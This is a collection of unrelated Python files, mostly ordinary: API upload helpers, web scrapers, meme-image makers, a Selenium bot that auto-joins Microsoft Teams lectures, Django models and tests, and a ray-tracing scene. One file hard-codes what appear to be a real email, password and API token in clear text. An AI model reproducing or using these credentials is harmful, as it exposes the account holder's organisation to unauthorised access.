def upload_and_save(files, parent_id, file_type, base_url, api_key):
"""
Upload list of files and save them
:param files: list of dicts where each file is:
{
'files': list of file paths,
'sample_name': name of sample,
'ext': files extension
}
:param parent_id: id of parent folder
:param file_type: type of analysis (shotgun, amplicon, ...)
:param base_url: base url of api
:param api_key: api key of current user
"""
client = create_client(base_url=base_url, api_key=api_key)
try:
items = []
for file_name in files["files"]:
items.append(
upload_file(
file=file_name,
file_type=file_type,
parent_id=parent_id,
api_key=api_key,
base_url=base_url,
)
)
data = dict(
source=dict(type="web-upload", items=items),
sample_name=files["sample_name"],
folder_id=parent_id,
file_type=file_type,
)
create_file_url = client.base_url + urls.SAMPLES_URL
create_response = requests_retry_session().post(
create_file_url, json=data, headers=client.header
)
if create_response.status_code == 200:
return create_response.json()
else:
raise UploadException("Failed to upload files: %s" % data["sample_name"])
except NotEnoughCredits:
LOGGER.error("Not Enough Credits")
return False
except AuthenticationFailed:
LOGGER.error("Authentication Failed")
return False
except UploadException:
LOGGER.error("File Upload Failed.")
return False
def pricing(data, base_url, api_key):
client = create_client(base_url=base_url, api_key=api_key)
pricing_url = client.base_url + urls.SAMPLES_PRICING_URL
pricing_response = requests_retry_session().post(
url=pricing_url, json={"data": data}, headers=client.header
)
if pricing_response.status_code == 200:
return pricing_response.json()
else:
pricing_response.raise_for_status()
|
#coding:utf-8
import urllib2
from bs4 import BeautifulSoup
import re
import sys
reload(sys)
sys.setdefaultencoding('utf8')
urls = []
for i in range(4):
url = "http://ggzy.njzwfw.gov.cn/njweb/fjsz/068001/068001001/" + str(i+1) + ".html"
urls.append(url)
urlroot = "http://ggzy.njzwfw.gov.cn"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
"Referer": "http://ggzy.njzwfw.gov.cn/njweb/fjsz/buildService1.html"
}
for u in urls:
req = urllib2.Request(u, headers=headers)
res = urllib2.urlopen(req).read()
soup = BeautifulSoup(res, 'lxml')
div_articles = soup.find_all("li", class_="ewb-info-item2")
for i in div_articles:
result = i.find_all('div')
type = result[2].find('p')['title']
if type == u"设计":
title = result[1].find('p')['title']
price = result[3].find('p').text
time = result[4].find('p').text
link = i['onclick']
p = re.compile(r'\'(.+?)\'')
link_s = urlroot + p.findall(link)[0]
print title
print type
print price
print time
print link_s
print "================="
|
import asyncio
from PIL import Image, ImageDraw, ImageFont
from datetime import date
async def stick_maker_static_traitor(
text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
"""
有内鬼表情包模板
"""
def __handle() -> Image.Image:
# 初始化背景图层
background = Image.new(mode="RGB", size=(image_wight, image_height), color=(255, 255, 255))
# 处理文字层 字数部分
text_num_img = Image.new(mode="RGBA", size=(image_wight, image_height), color=(0, 0, 0, 0))
font_num_size = 48
font_num = ImageFont.truetype(font_path, font_num_size)
ImageDraw.Draw(text_num_img).text(xy=(0, 0), text=f'{len(text)}/100', font=font_num, fill=(255, 255, 255))
# 处理文字层 主体部分
text_main_img = Image.new(mode="RGBA", size=(image_wight, image_height), color=(0, 0, 0, 0))
font_main_size = 54
font_main = ImageFont.truetype(font_path, font_main_size)
# 按长度切分文本
spl_num = 0
spl_list = []
for num in range(len(text)):
text_w = font_main.getsize_multiline(text[spl_num:num])[0]
if text_w >= 415:
spl_list.append(text[spl_num:num])
spl_num = num
else:
spl_list.append(text[spl_num:])
test_main_fin = ''
for item in spl_list:
test_main_fin += item + '\n'
ImageDraw.Draw(text_main_img).multiline_text(xy=(0, 0), text=test_main_fin, font=font_main, spacing=8,
fill=(0, 0, 0))
# 处理文字部分旋转
text_num_img = text_num_img.rotate(angle=-9, expand=True, resample=Image.BICUBIC, center=(0, 0))
text_main_img = text_main_img.rotate(angle=-9.5, expand=True, resample=Image.BICUBIC, center=(0, 0))
# 向模板图片中置入文字图层
background.paste(im=image_file, box=(0, 0))
background.paste(im=text_num_img, box=(435, 140), mask=text_num_img)
background.paste(im=text_main_img, box=(130, 160), mask=text_main_img)
return background
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(None, __handle)
return result
async def stick_maker_static_jichou(
text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
"""
记仇表情包模板
"""
def __handle() -> Image.Image:
# 处理文本主体
text_ = f"今天是{date.today().strftime('%Y年%m月%d日')}{text}, 这个仇我先记下了"
font_main_size = 42
font_main = ImageFont.truetype(font_path, font_main_size)
# 按长度切分文本
spl_num = 0
spl_list = []
for num in range(len(text_)):
text_w = font_main.getsize_multiline(text_[spl_num:num])[0]
if text_w >= (image_wight * 7 // 8):
spl_list.append(text_[spl_num:num])
spl_num = num
else:
spl_list.append(text_[spl_num:])
text_main_fin = '\n'.join(spl_list)
font = ImageFont.truetype(font_path, font_main_size)
text_w, text_h = font.getsize_multiline(text_main_fin)
# 处理图片
background_w = image_wight
background_h = image_height + text_h + 20
background = Image.new(mode="RGB", size=(background_w, background_h), color=(255, 255, 255))
# 处理粘贴位置 顶头
image_coordinate = (0, 0)
background.paste(image_file, image_coordinate)
draw = ImageDraw.Draw(background)
# 计算居中文字位置
text_coordinate = (((background_w - text_w) // 2), image_height + 5)
draw.multiline_text(text_coordinate, text_main_fin, font=font, fill=(0, 0, 0))
return background
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(None, __handle)
return result
async def stick_maker_static_phlogo(
text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
"""
ph表情包模板
"""
def __handle() -> Image.Image:
# 处理文本主体
test_sentences = text.strip().split(maxsplit=1)
white_text = test_sentences[0]
yellow_text = test_sentences[1]
font_size = 640
font = ImageFont.truetype(font_path, font_size)
text_w, text_h = font.getsize(text)
y_text_w, y_text_h = font.getsize(yellow_text)
bg_y_text = Image.new(mode="RGB", size=(round(y_text_w * 1.1), round(text_h * 1.3)), color=(254, 154, 0))
draw_y_text = ImageDraw.Draw(bg_y_text)
draw_y_text.text((round(y_text_w * 1.1) // 2, round(text_h * 1.3) // 2),
yellow_text, anchor='mm', font=font, fill=(0, 0, 0))
radii = 64
# 画圆(用于分离4个角)
circle = Image.new('L', (radii * 2, radii * 2), 0) # 创建黑色方形
draw_circle = ImageDraw.Draw(circle)
draw_circle.ellipse((0, 0, radii * 2, radii * 2), fill=255) # 黑色方形内切白色圆形
# 原图转为带有alpha通道(表示透明程度)
bg_y_text = bg_y_text.convert("RGBA")
y_weight, y_height = bg_y_text.size
# 画4个角(将整圆分离为4个部分)
alpha = Image.new('L', bg_y_text.size, 255) # 与img同大小的白色矩形,L 表示黑白图
alpha.paste(circle.crop((0, 0, radii, radii)), (0, 0)) # 左上角
alpha.paste(circle.crop((radii, 0, radii * 2, radii)), (y_weight - radii, 0)) # 右上角
alpha.paste(circle.crop((radii, radii, radii * 2, radii * 2)), (y_weight - radii, y_height - radii)) # 右下角
alpha.paste(circle.crop((0, radii, radii, radii * 2)), (0, y_height - radii)) # 左下角
bg_y_text.putalpha(alpha) # 白色区域透明可见,黑色区域不可见
w_text_w, w_text_h = font.getsize(white_text)
bg_w_text = Image.new(mode="RGB", size=(round(w_text_w * 1.05), round(text_h * 1.3)), color=(0, 0, 0))
w_weight, w_height = bg_w_text.size
draw_w_text = ImageDraw.Draw(bg_w_text)
draw_w_text.text((round(w_text_w * 1.025) // 2, round(text_h * 1.3) // 2),
white_text, anchor='mm', font=font, fill=(255, 255, 255))
text_bg = Image.new(mode="RGB", size=(w_weight + y_weight, y_height), color=(0, 0, 0))
text_bg.paste(bg_w_text, (0, 0))
text_bg.paste(bg_y_text, (round(w_text_w * 1.05), 0), mask=alpha)
t_weight, t_height = text_bg.size
background = Image.new(mode="RGB", size=(round(t_weight * 1.2), round(t_height * 1.75)), color=(0, 0, 0))
b_weight, b_height = background.size
background.paste(text_bg, ((b_weight - t_weight) // 2, (b_height - t_height) // 2))
return background
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(None, __handle)
return result
__all__ = [
'stick_maker_static_traitor',
'stick_maker_static_jichou',
'stick_maker_static_phlogo'
]
|
from time import sleep
from selenium.webdriver.common.keys import Keys
from .Team import Team
from .Meeting import Meeting
from ..common.settings import config
from ..common import functions as fn
class User:
"""Defines an Microsoft Teams user.
Attributes:
email (str): stores email of the user
password (str): stores password of the user
"""
def __init__(self, email: str, password: str, teams: list[Team]=None):
self.email = email
self.password = password
self._teams = teams
def __repr__(self):
return (
f"{self.email}\n"
f"{self.password}\n"
f"{self.teams}"
)
@property
def teams(self) -> list[Team]:
""":obj:`list` of :obj:`Team`: the teams the user is on"""
return self._teams
@teams.setter
def teams(self, value):
self._teams = value
@staticmethod
def get_teams() -> list[Team]:
selector = "ul>li[role='treeitem']>div[sv-element]"
teams = fn.browser.find_elements_by_css_selector(selector)
names = [team.get_attribute("data-tid") for team in teams]
names = [name[name.find('team-') + 5:name.rfind("-li")] for name in names]
headers = [team.find_element_by_css_selector("h3") for team in teams]
ids = [header.get_attribute("id") for header in headers]
return [Team(names[i], ids[i]) for i in range(len(teams))]
class Bot(User):
"""Simulates behaviour of an Microsoft Teams user.
Attributes:
email (str): stores email of the user
password (str): stores password of the user
"""
def __init__(self, email, password):
super().__init__(email, password)
def start(self):
self.sign_in()
sleep(15)
self.teams = self.get_teams()
if meetings := self.get_meetings(self.teams):
for team in self.teams:
if team.name == config["TEAM"]:
for channel in team.channels:
if channel.has_meeting:
print("> Captain, looks like I've found our lecture!")
self.connect(meetings[0])
else:
print("> I didn't find any meeting.")
def sign_in(self) -> None:
"""Sign in to the Microsoft Teams"""
# Find a login form
email_class = fn.query_selector("input[type='email']", 30)
if email_class:
email_class.send_keys(self.email)
# Avoid StaleElementReferenceException
email_class = fn.query_selector("input[type='email']", 5)
if email_class:
email_class.send_keys(Keys.ENTER)
login_class = fn.query_selector("input[type='password']", 10)
if login_class:
login_class.send_keys(self.password)
# Avoid StaleElementReferenceException
login_class = fn.query_selector("input[type='password']", 5)
if login_class:
login_class.send_keys(Keys.ENTER)
# Accept all proposals to keep logged in and use
# browser instead of app to log in MS Teams finally.
keep_logged_in = fn.query_selector("input[id='idBtn_Back']", 5)
if keep_logged_in:
keep_logged_in.click()
use_web_instead = fn.query_selector(".use-app-lnk", 5)
if use_web_instead:
use_web_instead.click()
@staticmethod
def go_to_calendar():
calendar_selector = "button.app-bar-link > ng-include > svg.icons-calendar"
calendar = fn.query_selector(calendar_selector, 5)
calendar.click() if calendar else None
@staticmethod
def go_to_teams():
teams_selector = "button.app-bar-link > ng-include > svg.icons-teams"
teams = fn.query_selector(teams_selector, 5)
teams.click() if teams else None
def get_meetings(self, teams=None):
if teams is None:
teams = self.teams
meetings = []
conversations = "https://teams.microsoft.com/_#/conversations/a"
for team in teams:
for channel in team.channels:
if channel.has_meeting:
script = f'window.location = "{conversations}a?threadId={channel.id_}&ctx=channel";'
fn.browser.execute_script(script)
self.go_to_teams()
meeting_element = fn.query_selector(".ts-calling-thread-header", 10)
if meeting_element is None:
continue
meeting_elements = fn.browser.find_elements_by_css_selector(".ts-calling-thread-header")
for meeting_element in meeting_elements:
meeting_id = meeting_element.get_attribute("id")
meetings.append(Meeting(id_=meeting_id,
title=f"{team.name} -> {channel.name}",
channel=channel.id_))
return meetings
def connect(self, meeting):
conversations = "https://teams.microsoft.com/_#/conversations/a"
script = f'window.location = "{conversations}a?threadId={meeting.channel}&ctx=channel";'
fn.browser.execute_script(script)
self.go_to_teams()
btn_selector = f"div[id='{meeting.id_}'] > calling-join-button > button"
join_btn = fn.query_selector(btn_selector, 5)
if join_btn is None:
return None
fn.browser.execute_script("arguments[0].click()", join_btn)
join_now_btn = fn.query_selector("button[data-tid='prejoin-join-button']", 30)
if join_now_btn is None:
return None
# Turn off the camera
selector = "toggle-button[data-tid='toggle-video']>div>button"
video_btn = fn.browser.find_element_by_css_selector(selector)
video_is_on = video_btn.get_attribute("aria-pressed")
if video_is_on == "true": # "true" must be a string
video_btn.click()
print("> Turned off the Video.")
# Turn off the microphone
selector = "toggle-button[data-tid='toggle-mute']>div>button"
audio_btn = fn.browser.find_element_by_css_selector(selector)
audio_is_on = audio_btn.get_attribute("aria-pressed")
if audio_is_on == "true": # Not a mistake!
audio_btn.click()
print("> Turned off the Audio.")
# Avoid StaleElementReferenceException
selector = "button[data-tid='prejoin-join-button']"
join_now_btn = fn.query_selector(selector, 5)
if join_now_btn is None:
return None
join_now_btn.click()
print(f"> Just have joined the meeting on {meeting}") |
from django.db import models
from django.utils.timezone import now
from django_extensions.db.models import TimeStampedModel, ActivatorModel
from simple_history.models import HistoricalRecords
class Product(TimeStampedModel, ActivatorModel):
class Size(models.TextChoices):
null = ""
Tall = "tall"
Grande = "grande"
Venti = "venti"
pd_num = models.CharField("상품번호", max_length=100, unique=True, db_index=True)
name = models.CharField("상품명", max_length=200)
price = models.IntegerField("가격", default=0)
size = models.CharField(
"사이즈", choices=Size.choices, max_length=8, blank=True, default=""
)
kind = models.ForeignKey(
"logistics.kind",
verbose_name="상품종류",
related_name="kind_set",
on_delete=models.CASCADE,
)
history = HistoricalRecords(history_change_reason_field=models.TextField(null=True))
class Meta:
verbose_name = "상품"
verbose_name_plural = "상품 목록"
ordering = ["pd_num"]
def __str__(self):
return f"{self.pd_num} {self.name}"
def save(self, *args, **kwargs):
self.update_modified = kwargs.pop(
"update_modified", getattr(self, "update_modified", True)
)
if not self.activate_date:
self.activate_date = now()
super().save(**kwargs)
|
# Generated by Django 2.2.7 on 2019-12-02 18:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('organization', '0006_auto_20191123_1738'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('operation', '0005_auto_20191127_1714'),
]
operations = [
migrations.CreateModel(
name='UserTeacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_time', models.DateTimeField(auto_now_add=True)),
('teacher', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='organization.Teacher', verbose_name='教师信息')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='可登录用户信息')),
],
),
]
|
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn.datasets import load_wine
class mainFunc():
def __init__(self):
self.proc_LoadData()
#self.proc_TreatData()
self.proc_TrainModel()
def proc_LoadData(self, test=True):
data = load_wine()
self.dataBin = pd.DataFrame(data.data, columns = data.feature_names)
self.dataBin['target'] = data.target
if(test):
print(self.dataBin)
print()
def proc_TreatData(self, test=False):
pass
def proc_TrainModel(self, randomize = False):
self.X = self.dataBin.drop('target', axis='columns')
self.y= self.dataBin.target
X_a, X_b, y_a, y_b = train_test_split(self.X, self.y, test_size =0.25 )
self.model = GaussianNB()
self.model.fit(X_a, y_a)
print(self.model.score(X_b,y_b))
self.modelb = MultinomialNB()
self.modelb.fit(X_a, y_a)
print(self.modelb.score(X_b,y_b))
mainFunc() |
# -*- coding: utf-8 -*-
# @Time : 2019-01-23 11:29
# @Author : luomingming
from openpyxl import Workbook
class ExcelExporter:
def __init__(self):
self.wb = Workbook()
def export(self, row0, file):
sheet = self.wb.active
for column in range(0, len(row0)):
sheet.cell(row=1, column=column + 1).value = row0[column]
page_index = 1
row = 2
while True:
rt = self.get_list(page_index)
if not rt:
break
for data in rt:
self.assemble_row(sheet, data, row)
row = row + 1
page_index = page_index + 1
self.wb.save(file)
def get_list(self, page_index):
raise Exception('not implement get_list')
def assemble_row(self, sheet, data, row):
raise Exception('not implement assemble_row')
def set_cell(self, sheet, val, row, col):
cell = sheet.cell(row=row, column=col)
cell.value = val
|
# coding=utf-8
import scraperwiki
import lxml.html
import sqlite3
import re
BASE_URL = 'http://parliament.go.ke/the-senate/senators?start='
HONORIFIC_MAP = {
'Sen.': 'Q47515115'
}
PARTY_MAP = {
'N/A': '', # N/A
'ANC': 'Q47489380', # Amani National Congress
'CCM': 'Q47492863', # Chama Cha Mashinani
'EFP': 'Q42954840', # Economic Freedom Party
'FAP': 'Q47492871', # Frontier Alliance Party
'FORD-K': 'Q5473121', # Forum for the Restoration of Democracy – Kenya
'FORD - K': 'Q5473121', # Forum for the Restoration of Democracy – Kenya
'IND': 'Q327591', # Independent
'JP': 'Q27963537', # Jubilee Party of Kenya
'KANU': 'Q1422517', # Kenya African National Union
'KPP': 'Q47492848', # Kenya Patriots Party
'MCCP': 'Q47489396', # Maendeleo Chap Chap Party
'NAPK': 'Q47492879', # National Agenda Party of Kenya
'ODM': 'Q1640905', # Orange Democratic Movement
'PDR': 'Q7141057', # Party of Development and Reforms
'PNU': 'Q2559675', # Party of National Unity
'WDM-K': 'Q5251223', # Wiper Democratic Movement
'PDP': 'Q22666200', # Peoples Democratic Party
'CCU': 'Q5069325', # Chama Cha Uzalendo
'KNC': 'Q6392670', # Kenya National Congress
'DP': 'Q3272441', # Democratic Party
'ND': 'Q47490108', # New Democrats
'MUUNGANO': 'Q22666185', # Muungano Party
}
# We maintain an internal map of counties and constituencies to WD items.
# TODO: This should really live somewhere else
COUNTY_MAP = {
'Baringo': 'Q808201',
'Bomet': 'Q891952',
'Bungoma': 'Q2928204',
'Busia': 'Q1017519',
'Elgeyo Marakwet': 'Q15216433',
'Embu': 'Q1335242',
'Garisa': 'Q1494292',
'Homa Bay': 'Q1625834',
'Isiolo': 'Q1499046',
'Kajiado': 'Q285072',
'Kakamega': 'Q1721867',
'Kericho': 'Q1739252',
'Kiambu': 'Q2575594',
'Kilifi': 'Q1741307',
'Kirinyaga': 'Q2230311',
'Kisii': 'Q1743730',
'Kisumu': 'Q1743809',
'Kitui': 'Q1722597',
'Kwale': 'Q952571',
'Laikipia': 'Q1800699',
'Lamu': 'Q1951652',
'Machakos': 'Q1882639',
'Makueni': 'Q473717',
'Mandera': 'Q1477874',
'Marsabit': 'Q1323683',
'Meru': 'Q15045704',
'Migori': 'Q429955',
'Mombasa': 'Q1112885',
'Murang\'a': 'Q1781723',
'Nairobi': 'Q3335223',
'Nakuru': 'Q1852202',
'Nandi': 'Q1964569',
'Narok': 'Q1852220',
'Nyamira': 'Q1569613',
'Nyandarua': 'Q1714352',
'Nyeri': 'Q749665',
'Samburu': 'Q2096419',
'Siaya': 'Q3482913',
'Taita Taveta': 'Q7193788',
'Tana River': 'Q383150',
'Tharaka Nithi': 'Q2189432',
'Trans Nzoia': 'Q1278653',
'Turkana': 'Q1633078',
'Uasin Gishu': 'Q1121429',
'Vihiga': 'Q1313202',
'Wajir': 'Q1852209',
'West Pokot': 'Q590860',
}
parsedMembers = []
unreconciledCounties = []
unreconciledParties = []
PAGES = 4
PER_PAGE = 20
def cleanup(string):
# Strip any annoying whitespace
string = string.strip()
# Lose any curled apostrophies
string = string.replace(u'’', '\'')
return string
for x in range(0, PAGES):
pageStart = PER_PAGE * x
scrapeUrl = BASE_URL + str(pageStart)
print('(i) Scraping from ' + scrapeUrl)
# Get the page!
html = scraperwiki.scrape(scrapeUrl)
ssRoot = lxml.html.fromstring(html)
rows = ssRoot.cssselect('tr')
# Skip the header row
for row in rows[1:]:
memberData = {}
nameLink = row.cssselect('a')[0]
nameUnparsed = nameLink.text.strip()
nameRegex = re.search('(.+?) (.+?) (.+)', nameUnparsed)
memberData['honorific_string'] = nameRegex.group(1)
memberData['honorific_id'] = HONORIFIC_MAP[nameRegex.group(1)]
memberData['name'] = cleanup(nameRegex.group(3) + ' ' + nameRegex.group(2))
print(' ' + memberData['name'])
linkHref = nameLink.attrib['href']
idRegex = re.search('\/the-senate\/senators\/item\/(.+)', linkHref)
memberData['id'] = idRegex.group(1)
memberData['url'] = cleanup('http://parliament.go.ke/the-senate/senators/item/' + memberData['id'])
partyCode = cleanup(row.cssselect('td')[4].text)
memberData['party'] = partyCode
if partyCode in PARTY_MAP:
memberData['party_id'] = PARTY_MAP[partyCode]
else:
memberData['party_id'] = 'Code: "{}"'.format(partyCode)
unreconciledParties.append(partyCode)
electoralStatus = cleanup(row.cssselect('td')[5].text)
if electoralStatus == 'Elected':
# We only need to account for location if the person is elected.
# Nominees don't have these things, but are still members.
county = cleanup(row.cssselect('td')[2].text)
memberData['county'] = county
if county in COUNTY_MAP:
memberData['district_id'] = COUNTY_MAP[county]
else:
memberData['district_id'] = 'County: "{}"'.format(county)
unreconciledCounties.append(county)
print(' > Unreconciled county: ' + county)
parsedMembers.append(memberData)
print '(i) Counted {} Members so far...'.format(len(parsedMembers))
print('(i) Done.')
print '(i) Counted {} Members in total'.format(len(parsedMembers))
print '<!> {} unreconciled counties:'.format(len(unreconciledCounties))
print unreconciledCounties
print '<!> {} unreconciled parties:'.format(len(unreconciledParties))
print unreconciledParties
try:
scraperwiki.sqlite.execute('DELETE FROM data')
except sqlite3.OperationalError:
pass
scraperwiki.sqlite.save(
unique_keys=['id'],
data=parsedMembers)
|
from django.urls import path,include
from . import views
urlpatterns = [
path('<int:question_id>', views.question,name="question"),
path('search/',views.search,name="search"),
path('new/',views.new,name="new"),
path('delete/<int:question_id>',views.delete, name="delete"),
path('edit/<int:question_id>',views.edit, name="edit"),
path('attend/',views.attend, name = "attend"),
path('my_question',views.my_question, name = "my_question"),
]
|
import os
from glob import glob
from src.net import Mode
from src.flownet2.flownet2 import FlowNet2
FLAGS = None
def main():
folder = 'HMB_1'
img_dir = [y for x in os.walk('/media/astra/1TB/Data/Ch2_002/{}/resized'.format(folder)) for y in glob(os.path.join(x[0], '*.png'))]
img_dir.sort()
# Create a new network
net = FlowNet2(mode=Mode.TEST, debug=False)
out_dir = '/media/astra/1TB/Data/Ch2_002/{}/of/'.format(folder)
for i in range(100):
net.test(checkpoint='./checkpoints/FlowNet2/flownet-2.ckpt-0',
input_a_path=img_dir[i],
input_b_path=img_dir[i+1],
out_path=out_dir + 'opflow_{0:06d}.png'.format(i))
if i % 10 == 0:
print("Total {} images, now {}th image".format(len(img_dir), i))
if __name__ == '__main__':
main() |
#!/usr/bin/python
import math
"""Class"""
class Number(object):
"""Constructs a number."""
def __init__(self, value):
self.__value = value
def set_value(self, sum):
self.__value = sum
def get_value(self):
return self.__value
"""Redefine operators."""
def __add__(self,other):
return Number(self.__value + other.__value)
def __sub__(self,other):
return Number(self.__value - other.__value)
def __mul__(self,other):
return Number(self.__value * other.__value)
def __div__(self,other):
return Number(self.__value / other.__value)
def __str__(self):
return str(self.__value)
|
from django.test import TestCase
from datetime import datetime
from time import sleep
import json
from . import views
class ApiTestClass(TestCase):
# integration
def test_ping(self):
response = self.client.get('/api/ping')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'pong')
def test_get_timestamp_returns_200(self):
response = self.client.get('/api/timestamp')
self.assertEqual(response.status_code, 200)
def test_get_timestamp_can_update(self):
r1 = self.client.get('/api/timestamp')
sleep(2)
r2 = self.client.get('/api/timestamp')
self.assertNotEqual(r1.content, r2.content)
# unit
def test_get_timestamp_returns_correct_content(self):
date = datetime(1990, 3, 20, 19, 59, 29)
response = views.get_timestamp(None, lambda: date)
body = json.loads(response.content)
self.assertTrue('currentTime' in body.keys())
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(body.get('currentTime'), '1990-03-20 19:59:29')
|
import curses
from npyscreen import npysThemeManagers as ThemeManagers
class BlueTheme(ThemeManagers.ThemeManager):
_colors_to_define = (
('WHITE_BLUE', curses.COLOR_WHITE, curses.COLOR_BLUE),
('BLUE_WHITE', curses.COLOR_BLUE, curses.COLOR_WHITE),
('BLACK_BLUE', curses.COLOR_BLACK,curses.COLOR_BLUE),
('CYAN_BLUE', curses.COLOR_CYAN, curses.COLOR_BLUE),
('GREEN_BLUE', curses.COLOR_GREEN, curses.COLOR_BLUE),
('MAGENTA_BLUE', curses.COLOR_MAGENTA, curses.COLOR_BLUE),
('RED_BLUE', curses.COLOR_RED, curses.COLOR_BLUE),
('YELLOW_BLUE', curses.COLOR_YELLOW, curses.COLOR_BLUE),
('YELLOW_WHITE', curses.COLOR_YELLOW, curses.COLOR_WHITE),
('BLACK_RED', curses.COLOR_BLACK, curses.COLOR_RED),
('BLACK_GREEN', curses.COLOR_BLACK, curses.COLOR_GREEN),
('BLACK_YELLOW', curses.COLOR_BLACK, curses.COLOR_YELLOW),
)
default_colors = {
'DEFAULT': 'WHITE_BLUE',
'FORMDEFAULT': 'WHITE_BLUE',
'NO_EDIT': 'RED_BLUE',
'STANDOUT': 'CYAN_BLUE',
'CURSOR': 'WHITE_BLUE',
'CURSOR_INVERSE': 'BLUE_WHITE',
'LABEL': 'WHITE_BLUE',
'LABELBOLD': 'YELLOW_BLUE',
'CONTROL': 'YELLOW_BLUE',
'IMPORTANT': 'RED_BLUE',
'SAFE': 'GREEN_BLUE',
'WARNING': 'YELLOW_BLUE',
'DANGER': 'RED_BLUE',
'CRITICAL': 'RED_BLUE',
'GOOD': 'GREEN_BLUE',
'GOODHL': 'GREEN_BLUE',
'VERYGOOD': 'WHITE_BLUE',
'CAUTION': 'YELLOW_BLUE',
'CAUTIONHL': 'WHITE_BLUE',
'HILIGHT': 'YELLOW_BLUE'
}
|
#!python3
'''
This file is just for saving login details (in clear text)
To use, update the three member variables below to match
your login credentials
Updated token Nov 2020
Find latest details in LastPass.
'''
user = 'dataoperations+1@summitps.org'
password = 'qxm&85U!w$'
token = 'Nuqf32C1SL0vhnLvP4e6V3Ks'
|
from scene_helper import *
import sys
print('=== Wineglass Scene ===',file=sys.stderr)
w=1920
h=1080
obj=[]
light=[]
#wall_mat=Material((0.9,0.9,0.9),(0.07,0.07,0.07),0.3)
blue_wall_mat=Material((0,0,1),(0,0,0.7),0.3)
red_wall_mat=Material((0.85,0,0),(0.07,0,0),0.3)
mr_mat=MirrorMaterial((0.95,0.95,0.95))
gold_metal_mat=Material((0.85,0.85,0.85),(0.03,0.03,0.03),0.1)
bg_glass_mat=GlassMaterial(1.55,(1,1,1),(0.8,0.9,0.9))
yellow_glass_mat=GlassMaterial(1.55,(1,1,1),(0.9,0.9,0.6))
blue_glass_mat=GlassMaterial(1.55,(1,1,1),(0.7,0.7,0.9))
red_glass_mat=GlassMaterial(1.55,(1,1,1),(0.9,0.8,0.7))
#bg_solid_glass_mat=SolidGlassMaterial(1.55,(1,1,1),(0.95,0.95,0.95))
bg_solid_glass_mat=SolidGlassMaterial(1.55,(1,1,1),(0.8,0.9,0.9))
wall_mat=Material(("chessboard.jpg",(0.2,0.2)),(0.04,0.04,0.04),0.3)
env_light_mat=Material((0.01,0.01,0.01),(0.03,0.03,0.03),0.8,'hdrsky_249.hdr')
#light_mat=Material((0.1,0.1,0.1),(0.1,0.1,0.1),0.3,"hdrsky_249.hdr")
wood_mat=Material(("wood.jpg",(0.1,0.1)),(0.04,0.04,0.04),0.2)
#light_mat=Material((1,1,1),(0.7,0.7,0.7),0.3,(100,100,100))
ball_mat=Material((0.85,0.85,0.85),(0.9,0.9,0.9),0.05)
#light.append(PointLightDecay((-15,13,18),(0.7*30,0.7*30,0.7*30)))
#wineglass_seq=[[-0.459543, -0.0], [-0.459544, -0.0], [-0.459545, -0.0], [-0.426747, 0.351882], [-0.278898, 0.848656], [0.084005, 1.112097], [1.105511, 1.164785], [2.328629, 0.991667], [2.50336, 1.029301], [2.3456, 1.0888], [1.1628, 1.278], [0.0552, 1.2148], [-0.3812, 0.9156], [-0.622, 0.3804], [-0.9684, 0.144], [-1.48, 0.0968], [-2.1124, 0.1284], [-2.2028, 0.3172], [-2.2628, 0.9944], [-2.3232, 1.2148], [-2.3984, 1.1992], [-2.4588, 1.0576], [-2.4588, 0.7112], [-2.4588, -0.0], [-2.458801, -0.0], [-2.458802, -0.0]]
glass_seq=[[-0.8, -0.459543], [-0.8, -0.459544], [-0.8, -0.459545], [-0.871882, -0.426747], [-0.948656, -0.278898], [-1.112097, 0.084005], [-1.164785, 1.105511], [-0.991667, 2.328629], [-1.029301, 2.50336], [-1.0888, 2.3456], [-1.278, 1.1628], [-1.2148, 0.0552], [-0.9156, -0.3812], [-0.3804, -0.522], [-0.0, -0.6684]]
obj.append(Sphere((-13,2,9),25,env_light_mat))
#obj.append(Sphere((2,1,0),1,yellow_glass_mat))
obj.append(RotateBSpline([3,0.6684,3],glass_seq,blue_glass_mat))
#obj.append(Sphere((5,2,8),2,bg_solid_glass_mat))
obj.append(Sphere((5,2,8),2,bg_solid_glass_mat))
ParseObj("bunny_1k.obj",obj,lambda x:(x[0]*10,(x[1]-0.07)*10,x[2]*10-3),mr_mat)
#obj.append(Triangle((3,1,0),(3,5,0),(3,1,3),glass_mat))
obj.append(Plane((0,1,0),0,wood_mat))
#obj.append(Plane((1,0,0),7,wall_mat))
cam=PerspectiveCamera((-13,5,9),
(0.8968228648554929,-0.2638730619654009,-0.3550772914081536),
(0.2453429990417326,0.9645575115980382,-0.09713815385474979),w,h,1500)
setup={'obj':obj,'light':light,'cam':cam}
dump_setup(setup) |
import serial
import Petduino
from time import sleep
import sys
def main():
try:
pet = Petduino.Petduino('.\petduino.cfg')
except Petduino.UnhappyPetduino as sadness:
print "There is a disturbance in the force: %s" % sadness
sys.stdin.read()
sys.exit()
while True:
pet.setData("0000001800000000")
sleep(0.1)
pet.setData("00003C243C000000")
sleep(0.1)
pet.setData("007E42665A7E0000")
sleep(0.1)
pet.setData("FF81C3A59981FF00")
sleep(0.5)
pet.setData("007E42665A7E0000")
sleep(0.1)
pet.setData("00003C243C000000")
sleep(0.1)
if __name__ == "__main__":
main() |
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 4 13:09:17 2020
@author: saiguna
Problem Statement: If you were to pick up points randomly from a square grid of dimension 6 x 6
